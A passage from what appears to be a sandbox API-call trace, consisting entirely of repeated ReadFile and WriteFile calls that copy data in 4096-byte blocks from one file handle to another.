lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.476] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.476] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.476] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.476] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.476] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.476] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.477] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.477] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.477] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.477] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.477] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.477] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.478] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.479] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.479] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.479] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.479] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.479] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.479] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.480] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.481] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.481] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.481] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.481] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.481] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.481] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.482] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.483] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.483] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.484] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.485] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.485] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.485] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.485] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.485] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.485] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.486] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.487] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.488] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.489] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.489] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.489] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.490] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: 